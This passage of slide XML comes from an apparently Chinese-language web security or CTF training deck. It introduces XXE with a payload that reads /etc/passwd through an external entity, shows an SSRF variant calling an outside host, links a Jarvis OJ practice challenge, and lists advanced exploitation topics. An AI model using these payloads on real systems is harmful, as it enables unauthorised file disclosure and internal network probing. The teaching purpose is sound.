                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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347813938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3749040" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>简介：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{709B080C-A7BE-8644-AEAE-CCAAFA639A1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="2014090"/>
            <a:ext cx="3566160" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDB2449-6B08-A842-9C9A-CD669F65EDE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="3103156"/>
            <a:ext cx="8138160" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8190A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B3E0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</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1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8190A0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="91B3E0"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</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utf-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AAAAAA"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://zzm.cat:8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;]&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4B83CD"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="24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17925702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58520" y="172720"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C1E2210-D996-9640-B7EC-E1D42F0AB2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625048" y="1019294"/>
            <a:ext cx="4374916" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>http://web.jarvisoj.com:9882/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402001771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58520" y="172720"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C1E2210-D996-9640-B7EC-E1D42F0AB2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625048" y="1019294"/>
            <a:ext cx="4374916" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>http://web.jarvisoj.com:9882/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE94440-7B58-3149-BF3F-0E6FF1CD5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 y="1657350"/>
            <a:ext cx="11772900" cy="5067300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33873840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58520" y="172720"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>练习</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C1E2210-D996-9640-B7EC-E1D42F0AB2AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="625048" y="1019294"/>
            <a:ext cx="4374916" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>http://web.jarvisoj.com:9882/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FA9ACD-AA2B-4748-80E7-D64EEE507F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848" y="1724799"/>
            <a:ext cx="11150527" cy="5133201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409727575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2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8DEB5-0F52-604C-8E06-F44E4891C047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1810265"/>
            <a:ext cx="8945880" cy="1955151"/>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漏洞综合利用（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>e.g.,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>+SSRF+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反序列化）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>少见的姿势（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>e.g.,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符命令执行）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>少见的语言（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ruby</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
